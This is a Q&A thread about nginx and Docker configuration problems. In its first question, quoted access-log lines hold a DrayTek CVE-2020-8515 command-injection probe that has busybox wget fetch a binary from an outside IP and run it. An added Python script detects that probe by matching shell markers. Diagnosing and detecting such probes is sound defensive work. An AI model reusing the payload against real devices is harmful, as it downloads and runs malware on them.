nginx logs appear to show the wrong info - docker

I'm running nginx with Django on a production server, with the following settings:
# normally you leave this at the default of 1024
events {
worker_connections 1024;
}
http {
# cf http://blog.maxcdn.com/accept-encoding-its-vary-important/
gzip_vary on;
gzip_proxied any;
gzip_types *;
# http://nginx.org/en/docs/http/configuring_https_servers.html#optimization
ssl_session_cache shared:SSL:1m;
ssl_session_timeout 10m;
server_tokens off;
upstream django {
server webapp:8000;
}
# ---------------------------------------------------------------------------
# Production
#
# Use this configuration for a deployment. You'll have to configure SSL.
# ---------------------------------------------------------------------------
#server {
# # rewrite all HTTP to HTTPS
# listen 80;
# server_name ${NGINX_SERVER_NAME};
#
# return 301 https://${NGINX_SERVER_NAME}${DOLLAR}request_uri;
#}
# ---------------------------------------------------------------------------
# Development
#
# You may use this for development. It doesn't use SSL, making it unsafe.
# Remove this setting when moving to production.
# ---------------------------------------------------------------------------
server {
# rewrite all HTTP to HTTPS
listen 80;
server_name ${NGINX_SERVER_NAME};
location /static {
alias /srv/covidoff/static;
# http://stackoverflow.com/q/19213510/1346257
include /etc/nginx/mime.types;
}
location = /robots.txt { return 200 "User-agent: *\nAllow: /"; }
location = /favicon.ico { access_log off; log_not_found off; return 404; }
location / {
uwsgi_pass django;
include uwsgi_params;
}
}
server {
listen 443 ssl default_server;
server_name ${NGINX_SERVER_NAME};
# see http://nginx.org/en/docs/http/configuriNGINX_https_servers.html
ssl_certificate /etc/ssl/certs/${NGINX_CRT_NAME}.crt;
ssl_certificate_key /etc/ssl/private/${NGINX_KEY_NAME}.key;
ssl_prefer_server_ciphers on;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # ie defaults minus SSLv3
location /static {
alias /srv/covidoff/static;
# http://stackoverflow.com/q/19213510/1346257
include /etc/nginx/mime.types;
}
location = /robots.txt { return 200 "User-agent: *\nAllow: /"; }
location = /favicon.ico { access_log off; log_not_found off; return 404; }
location / {
uwsgi_pass django;
include uwsgi_params;
}
}
}
Note: I know that the settings aren't supposed to be like that because it doesn't use HTTPS, but that's what we're using at the moment. It should be fixed later.
One thing that is confusing me is that—given the Docker setup that was provided to me—there are two configuration nginx files, the other one being:
server {
listen 80;
location / {
proxy_pass http://localhost:8000;
proxy_redirect off;
}
}
Worse, the docker compose YAML file appears to be pointing to the second file, not the first, but it is the changes that I make to the first that are reflected on the server.
version: "3"
volumes:
  static-files:
    driver: local
  postgres:
    driver: local
services:
  db:
    image: postgres:11.1
    volumes:
      - postgres:/var/lib/postgresql/data/pgdata
    env_file:
      - ./config/environment/development.env
    expose:
      - "5432"
  webserver:
    build: ./nginx
    ports:
      - "80:80"
      - "443:443"
  webapp:
    build:
      context: webapp
    volumes:
      - ./webapp/covidoff:/srv/covidoff
      - static-files:/srv/static-files
    ports:
      - "8000:8000"
    depends_on:
      - db
    env_file:
      - ./config/environment/development.env
You can see the full project here.
Right now I'm not so worried about the server configuration, but it might be important for what I'm about to point out.
After launching (e.g. docker-compose up -d), I see the logs for nginx and they are... Well... Weird.
As you can see from the docker-compose, I have three services running: Django, nginx and Postgres. Using docker logs I see the Django service getting hit quite frequently by requests, but those requests are not showing on the nginx server.
Instead, nginx just shows stuff that I really don't get where it's coming from, such as this request for index.php:
124.156.160.69 - - [02/Apr/2020:18:05:24 +0000] "GET /websql/index.php HTTP/1.1" 502 559 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" "-"
Or even GET /, since there's no such thing in deployment:
202.52.58.6 - - [02/Apr/2020:18:35:50 +0000] "GET / HTTP/1.1" 502 157 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" "-"
95.70.169.166 - - [02/Apr/2020:19:36:19 +0000] "GET / HTTP/1.1" 400 157 "-" "-" "-"
186.64.111.98 - - [02/Apr/2020:19:36:51 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1" 400 157 "-" "-" "-"
2020/04/02 20:18:20 [error] 8#8: *2171 connect() failed (111: Connection refused) while connecting to upstream, client: 209.17.97.2, server: , request: "GET / HTTP/1.1", upstream: "http://127.0.0.1:8000/", host: "34.242.160.202:80"
209.17.97.2 - - [02/Apr/2020:20:18:20 +0000] "GET / HTTP/1.1" 502 157 "-" "Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)" "-"
What I need is the normal access.log, with the requests that are hitting django. I don't know what the logs for nginx are showing, or where those requests are coming from.
In the nginx docker container, if I run docker exec -it de807b6ad160 ls /var/log/nginx -la, I get:
lrwxrwxrwx 1 root root 11 Oct 21 19:02 access.log -> /dev/stdout
lrwxrwxrwx 1 root root 11 Oct 21 19:02 error.log -> /dev/stderr
Which means that the log files are empty and (rightfully) being redirected to stdout/stderr.
What am I missing?

Apparently that call to /cgi-bin/mainfunction.cgi is an exploit to create a remote login to your server. I just had the same call. I'm running a different web server, in my case Apache:
200.188.153.18 - - [03/Apr/2020:11:03:34 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1" 400 0 "-" "-"
The only difference I see is the IP it is coming from and the response I'm giving (400).

Yep, it's an exploit, and I found source code named "CVE-2020-8515: DrayTek pre-auth remote root RCE".
Check your system for bad access. Have a nice day!
[1]: https://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html
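A defender-side triage of the kind of access-log lines quoted in this thread, added here as an example (it is not code from any of the posters). It tags the /cgi-bin/mainfunction.cgi command-injection probe and requests for a stack the site does not run, and records whether the server answered with a non-error status. The sample lines are constructed with documentation IP ranges, and the rule that a Django site serves no .php or .cgi paths is an assumption.

```python
import re
from urllib.parse import unquote

# nginx "combined"-style access line: client, timestamp, request line, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>.*?)" (?P<status>\d{3}) ')
PROBE_PATH = "/cgi-bin/mainfunction.cgi"          # path named in the thread
SHELL_MARKERS = ("${IFS}", "/bin/sh", "wget", "chmod")
FOREIGN_SUFFIXES = (".php", ".cgi")               # assumption: not served here

# Constructed sample input (not taken from a real server).
SAMPLE_LOG = """
198.51.100.7 - - [02/Apr/2020:18:05:24 +0000] "GET /websql/index.php HTTP/1.1" 502 559 "-" "Mozilla/5.0" "-"
203.0.113.9 - - [02/Apr/2020:19:36:51 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'echo${IFS}test'%0A%27&loginUser=a&loginPwd=a HTTP/1.1" 400 157 "-" "-" "-"
203.0.113.20 - - [02/Apr/2020:20:18:20 +0000] "GET / HTTP/1.1" 502 157 "-" "Mozilla/5.0" "-"
2020/04/02 20:18:20 [error] 8#8: *2171 connect() failed (111: Connection refused) while connecting to upstream
"""


def classify(line):
    """Return a finding dict for an access-log line, or None for anything else."""
    m = LINE_RE.match(line)
    if m is None:
        return None                      # error-log lines, blank lines
    parts = m["request"].split(" ")
    target = parts[1] if len(parts) >= 2 else ""   # malformed request line
    path, _, query = target.partition("?")
    decoded = unquote(query)             # %27, %0A etc. become literal characters
    if path == PROBE_PATH and any(s in decoded for s in SHELL_MARKERS):
        tag = "draytek-cgi-injection"
    elif path.lower().endswith(FOREIGN_SUFFIXES):
        tag = "foreign-stack-probe"
    else:
        tag = "unclassified"
    status = int(m["status"])
    # "answered" marks a non-error reply, which deserves a closer look.
    return {"ip": m["ip"], "path": path, "tag": tag,
            "status": status, "answered": status < 400}


def scan(lines):
    """Keep only the lines that matched one of the probe rules."""
    findings = (classify(line) for line in lines)
    return [f for f in findings if f and f["tag"] != "unclassified"]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.strip().splitlines()):
        print(finding)
```

A probe that was rejected with 400 or 502, as in the lines above, never reached an application handler; a tagged line with `answered` set to true is the one to investigate first.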

Related

Redirect address name to a react app running on localhost using nginx - bad gateway

I'm building a personal application. It is called SCC. I would like to be able to redirect an address, like scc.com, to my localhost environment, just for the sake of using my auth0 configuration for OAuth.
I'm trying to use Nginx for this.
Basic Structure
Backend GOLang API Running on localhost:8080
Frontend React App Running on localhost:3000
I've tried configuring Nginx as a reverse proxy, but I get Bad Gateway and I'm not able to solve it.
I confirm both apps, front and back, are running.
My nginx docker is running.
The container is created with the following command:
docker run --name nginx \
-p 80:80 -p 443:443 \
-v /home/rafael/repos/streaming-cost-control/nginx.conf:/etc/nginx/nginx.conf \
-v /home/rafael/repos/streaming-cost-control/cert/server.crt:/etc/nginx/server.crt \
-v /home/rafael/repos/streaming-cost-control/cert/server.key:/etc/nginx/server.key \
-d nginx:mainline-alpine
and my nginx.conf file is as follows
user nginx;
worker_processes auto;
error_log /var/log/nginx/error.log notice;
pid /var/run/nginx.pid;
events {
worker_connections 1024;
}
http {
server {
listen 80;
server_name localhost;
location / {
proxy_pass https://localhost:3000/;
}
}
server {
listen 443 ssl;
ssl_certificate server.crt;
ssl_certificate_key server.key;
server_name localhost;
location / {
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_pass https://localhost:3000/;
}
}
}
I've also added this address to my hosts file
127.0.0.1 localhost
127.0.0.1 scc.com
#127.0.0.1 www.scc.com
# Added by Docker Desktop
192.168.1.6 host.docker.internal
192.168.1.6 gateway.docker.internal
# To allow the same kube context to work on the host and the container:
127.0.0.1 kubernetes.docker.internal
# End of section
the error log on my nginx is:
2022/10/01 13:41:28 [error] 27#27: *8 connect() failed (111: Connection refused) while connecting to upstream, client: 172.17.0.1, server: localhost, request: "GET / HTTP/1.1", upstream: "https://127.0.0.1:3000/", host: "scc.com"
172.17.0.1 - - [01/Oct/2022:13:41:28 +0000] "GET / HTTP/1.1" 502 559 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
2022/10/01 13:41:28 [error] 27#27: *8 connect() failed (111: Connection refused) while connecting to upstream, client: 172.17.0.1, server: localhost, request: "GET /favicon.ico HTTP/1.1", upstream: "https://127.0.0.1:3000/favicon.ico", host: "scc.com", referrer: "https://scc.com/"
172.17.0.1 - - [01/Oct/2022:13:41:28 +0000] "GET /favicon.ico HTTP/1.1" 502 559 "https://scc.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
I'm running on windows with Ubuntu on WSL2
Could you help me find the issue?
Thanks in advance

Nginx container can't find plotly dash javascript within mounted volume

I have a web service powered via plotly dash running in a docker container reverse proxied by an nginx container, all coordinated via docker compose.
docker-compose.yaml
services:
  reverse_proxy:
    image: nginx:1.17.10
    volumes:
      - ./nginx.conf:/etc/nginx/nginx.conf:Z,ro # nginx configuration
      - ../../resources:/usr/share/nginx/html/:Z,ro # static assets, 404.html etc
      - /etc/pki/tls/certs/:/etc/pki/tls/certs/:Z,ro # SSL stuff
    ports:
      - "80:80"
      - "443:443"
    depends_on:
      - my_server
  my_server:
    image: my_server:v1.2.3
    command: --config /app/configs/prod.yaml --port 8050 8051
nginx.conf
upstream my_server {
ip_hash;
server my_server:8050;
server my_server:8051;
}
server {
listen 80 default_server;
listen [::]:80 default_server;
listen 443 ssl;
server_name my-server.com;
root /usr/share/nginx/html; # I assume this has something to do with it!
ssl_certificate /etc/pki/tls/certs/2022/my-server.crt;
ssl_certificate_key /etc/pki/tls/certs/2022/my-server.key;
ssl_password_file /etc/pki/tls/certs/2022/my-server.txt;
# Load configuration files for the default server block.
include /etc/nginx/default.d/*.conf;
location /prod/app/ {
proxy_pass http://my_server/;
proxy_redirect off;
proxy_buffering off;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
location = / {
root /usr/share/nginx/html; # or this...?
index index.html;
}
Upon running docker compose up --remove-orphans --force-recreate --renew-anon-volumes
I see the success message that my Dash server is running:
Dash is running on http://0.0.0.0:8050/
and the nginx container starts without error. However when I query my service via https://my-server.com/prod/app/
nginx fails to (cache?) and load plotly Dash javascript within its specified root directory:
# the location seems to be found and routed correctly
10.10.193.8 - - [28/Oct/2022:15:31:21 +0000] "GET /prod/app/ HTTP/1.1" 200 5324 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0" "-"
# fails due to css file not found
my-server-reverse_proxy-1 | 2022/10/28 15:31:21 [error] 7#7: *1 open() "/usr/share/nginx/html/assets/styles.css" failed (2: No such file or directory), client: 10.10.193.8, server: my-server.com, request: "GET /assets/styles.css?m=1666209805.0 HTTP/1.1", host: "my-server.com", referrer: "https://my-server.com/prod/app/"
# fails due to javascript not found
my-server-reverse_proxy-1 | 2022/10/28 15:31:21 [error] 7#7: *1 open() "/usr/share/nginx/html/_dash-component-suites/dash/dcc/dash_core_components.v2_6_2m1666209805.js" failed (2: No such file or directory), server: my-server.com, request: "GET /_dash-component-suites/dash/dcc/dash_core_components.v2_6_2m1666209805.js HTTP/1.1", host: "my-server.com", referrer: "https://my-server.com/prod/app/"
To debug, I examined the contents of my nginx container; the root directory does exist:
root#4c7190ea055a:/usr/share/nginx/html# ls
404.html 40x.html 50x.html bg.jpg index.html
I am not sure which of the following is causing this error:
nginx mis-configuration (I need to specify the server block root dir somewhere else?)
plotly Dash mis-configuration (I need to tell it to cache / load somewhere else?)
nginx docker volume issue (Doesn't seem to be the issue since I can view the folder inside the container?)
Any help is greatly appreciated!

How can I reverse proxy my API requests with nginx?

To add some context:
I'm running an Angular PWA with Node.js backend.
They run on different ports:
· Front-end: Hosted by nginx on port 80
· Back-end: Hosted by Node.js on port 3939
nginx is within a Docker container.
Thing is, I plan to redirect all traffic related to /api from port 80 to port 3939 internally via reverse proxy. I'm testing with /api/agenda to see if it works, but it isn't.
Here's the default.conf file I'm using:
server {
listen 80;
listen [::]:80;
server_name localhost;
#access_log /var/log/nginx/host.access.log main;
location / {
root /usr/share/nginx/html;
index index.html index.htm;
}
location /api/agenda {
proxy_pass http://localhost:3939;
}
#error_page 404 /404.html;
# redirect server error pages to the static page /50x.html
#
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root /usr/share/nginx/html;
}
}
I'm testing with Postman to see if redirect works, but I'm getting a 404 while accessing with this url:
http://localhost:80/api/agenda
If I access it using its original port, I do get the desired results, but that's not what I want to do.
http://localhost:3939/api/agenda
Edit: Here's the error logs I get in my docker console when I try to access http://localhost:80/api/agenda
1 | 172.19.0.1 - - [22/Jun/2022:07:13:50 +0000] "GET /api/agenda HTTP/1.1" 404 555 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36" "-"
nginx-conf-web-1 | 2022/06/22 07:55:18 [error] 28#28: *8 connect() failed (111: Connection refused) while connecting to upstream, client: 172.19.0.1, server: localhost, request: "GET /api/agenda HTTP/1.1", upstream: "http://127.0.0.1:3939/api/agenda", host: "localhost:80"
Thanks in advance for your help.
One of the comments worked for me, regarding #Ivan Shatsky.
Switching: https://localhost:port/api
to: https://host.docker.internal:port/api
Thank you to the people in the comments.

Nginx 404 not found

I am using docker compose for running nginx with the latest version. Using volumes, I am copying the nginx.conf file into the nginx docker container:
nginx:
  image: nginx:1.20
  container_name: nginx
  ports:
    - 80:80
  restart: unless-stopped
  volumes:
    - ./nginx/nginx.conf:/etc/nginx/default.conf
  depends_on:
    - strapi
    - rocketchat
    - keycloak
  networks:
    - test-network
All applications are running on the same network.
Here is the nginx.conf file
events {
worker_connections 4096; ## Default: 1024
}
http {
server {
listen 80;
server_name qa.xxx.com;
location / {
proxy_pass http://strapi-container:1337/;
}
location /chat {
proxy_pass http://rocketchat-container:3000;
}
location /auth {
proxy_pass http://keycloak-container:8080;
proxy_set_header Host $host;
}
}
}
My intention is to run the three backend URLs /, /chat, /auth with nginx configurations. When running the application on the instance, http://ip-address/chat and http://ip-address/auth don't seem to work.
Here is the nginx log error
2021/06/02 07:46:42 [error] 31#31: *1 open() "/usr/share/nginx/html/chat" failed (2: No such file or directory), client: 115.96.103.237, server: localhost, request: "GET /chat HTTP/1.1", host: "310.28.67.222"
115.96.103.237 - - [02/Jun/2021:07:46:42 +0000] "GET /chat HTTP/1.1" 404 555 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36" "-"
2021/06/02 07:46:50 [error] 31#31: *2 open() "/usr/share/nginx/html/auth" failed (2: No such file or directory), client: 115.96.103.237, server: localhost, request: "GET /auth HTTP/1.1", host: "310.28.67.222"
115.96.103.237 - - [02/Jun/2021:07:46:50 +0000] "GET /auth HTTP/1.1" 404 555 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36" "-"
Try trailing slashes behind the proxy_pass, unless you want to have the folder added.
location /chat {
proxy_pass http://rocketchat-cnr:3000;
}
redirects to http://rocketchat-cnr:3000/chat, while
location /chat {
proxy_pass http://rocketchat-cnr:3000/;
}
redirects to http://rocketchat-cnr:3000/
Visit http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_pass for more info.
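The trailing-slash rule from the answer above, modelled as an added example (not code from the answer or from nginx). It covers plain prefix locations only, with no regex locations and no variables in proxy_pass; `upstream_url` and `mapping_table` are hypothetical helper names. It goes one step beyond the answer by showing two side effects of pairing `location /chat` with a trailing-slash proxy_pass: a doubled slash for sub-paths, and unrelated paths such as /chatter being caught by the prefix.

```python
from urllib.parse import urlsplit


def upstream_url(location, proxy_pass, request_uri):
    """Model how nginx builds the upstream URL for a prefix location."""
    path, sep, query = request_uri.partition("?")
    if not path.startswith(location):
        raise ValueError(f"{path!r} is not handled by location {location!r}")
    target = urlsplit(proxy_pass)
    origin = f"{target.scheme}://{target.netloc}"
    if target.path == "":
        # proxy_pass without a URI part: the request URI is forwarded unchanged.
        return origin + request_uri
    # proxy_pass with a URI part (even a bare "/"): the part of the path that
    # matched the location prefix is replaced by that URI.
    return origin + target.path + path[len(location):] + sep + query


def mapping_table(location, proxy_pass, uris):
    """Map each request URI to the URL the upstream would receive."""
    return {uri: upstream_url(location, proxy_pass, uri) for uri in uris}


if __name__ == "__main__":
    uris = ["/chat", "/chat/room?id=1", "/chatter"]
    cases = [
        ("/chat", "http://rocketchat-cnr:3000"),    # no URI part
        ("/chat", "http://rocketchat-cnr:3000/"),   # URI part "/"
        ("/chat/", "http://rocketchat-cnr:3000/"),  # prefix and URI both end in "/"
    ]
    for location, proxy_pass in cases:
        print(f"location {location} -> proxy_pass {proxy_pass}")
        handled = [u for u in uris if u.startswith(location)]
        for uri, url in mapping_table(location, proxy_pass, handled).items():
            print(f"  {uri:18} => {url}")
```

Ending both the location prefix and the proxy_pass URI with a slash keeps the mapping one-to-one, which matters when access rules on the upstream are written against exact paths.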

NGINX multiple server blocks - 502 Bad Gateway

I'm trying to set up multiple servers using Nginx and Docker. For now, I want to make it work locally, but I'll export this to use it in a website. My nginx.conf is:
worker_processes 1;
events { worker_connections 1024; }
http {
client_max_body_size 2048M;
sendfile on;
upstream docker-phpmyadmin {
server phpmyadmin;
}
upstream docker-wordpress {
server wordpress;
}
upstream docker-api {
server api;
}
upstream docker-frontend {
server frontend;
}
server {
listen 80;
server_name example.com;
location / {
proxy_set_header Host $http_host;
proxy_pass http://docker-frontend;
}
}
server {
listen 80;
server_name api.example.com;
location / {
proxy_set_header Host $http_host;
proxy_pass http://docker-api;
}
}
server {
listen 80;
server_name db.example.com;
location / {
proxy_set_header Host $http_host;
proxy_pass http://docker-phpmyadmin;
}
}
server {
listen 80;
server_name admin.example.com;
location / {
proxy_read_timeout 3600;
proxy_set_header Host $http_host;
proxy_pass http://docker-wordpress;
}
}
}
I've added these entries to my /etc/hosts:
127.0.0.1 example.com
127.0.0.1 db.example.com
127.0.0.1 api.example.com
127.0.0.1 admin.example.com
My docker-compose.yml contains:
nginx:
  build: ./backend/nginx
  links:
    - wordpress
    - phpmyadmin
    - frontend
  ports:
    - ${NGINX_EXTERNAL_PORT}:80
  volumes:
    - "./backend/nginx/nginx.conf:/etc/nginx/nginx.conf"
So, locally, NGINX_EXTERNAL_PORT is set to 5000. I can access db.example.com:5000 and admin.example.com:5000, but when I try to access my main page example.com:5000 I get:
nginx_1 | 2019/09/18 21:26:52 [error] 6#6: *8 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: example.com, request: "GET / HTTP/1.1", upstream: "http://172.18.0.7:80/", host: "example.com:5000"
nginx_1 | 172.18.0.1 - - [18/Sep/2019:21:26:52 +0000] "GET / HTTP/1.1" 502 559 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
Am I missing something on my configuration for that server block? Thanks!
It turned out to be because the application that was in example.com was not exposing any port, so after including EXPOSE 3000 to the Dockerfile and changing the upstream to
upstream docker-frontend{
server frontend:3000;
}
Works!
